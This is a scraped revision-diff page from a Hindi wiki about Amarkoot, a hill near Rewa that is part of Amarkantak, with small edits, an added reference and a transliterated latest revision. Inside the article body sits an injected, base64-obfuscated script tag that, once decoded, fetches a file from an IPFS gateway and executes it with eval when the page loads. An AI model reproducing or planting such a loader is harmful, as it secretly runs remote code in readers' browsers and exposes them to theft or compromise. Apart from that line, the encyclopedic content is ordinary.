Difference between revisions of "अमरकूट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
'''अमरकूट''' रीवां से 97 मील दूर एक पहाड़ी है जो [[अमरकंटक]] का ही एक भाग है।  
+
'''अमरकूट''' [[रीवा]] से 97 मील दूर एक पहाड़ी है जो [[अमरकंटक]] का ही एक भाग है।  
*अमरकूट गहनवनों से आच्छादित है।  
+
*अमरकूट गहन वनों से आच्छादित है।  
*कई विद्वानों का मत है कि [[मेघदूत]]<ref>मेघदूत 1,16</ref> में वर्णित [[आम्रकूट]] यही है।  
+
*कई विद्वानों का मत है कि [[मेघदूत]]<ref>[[मेघदूत]] 1,16</ref> में वर्णित [[आम्रकूट]] यही है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 30| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
Line 10: Line 11:
 
[[Category:मध्य प्रदेश]]
 
[[Category:मध्य प्रदेश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
+
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]] [[Category:ऐतिहासिक स्थानावली]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 11:15, 3 May 2018

amarakoot riva se 97 mil door ek paha di hai jo amarakantak ka hi ek bhag hai.

  • amarakoot gahan vanoan se achchhadit hai.
  • kee vidvanoan ka mat hai ki meghadoot[1] mean varnit amrakoot yahi hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 30| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar
  1. meghadoot 1,16

sanbandhit lekh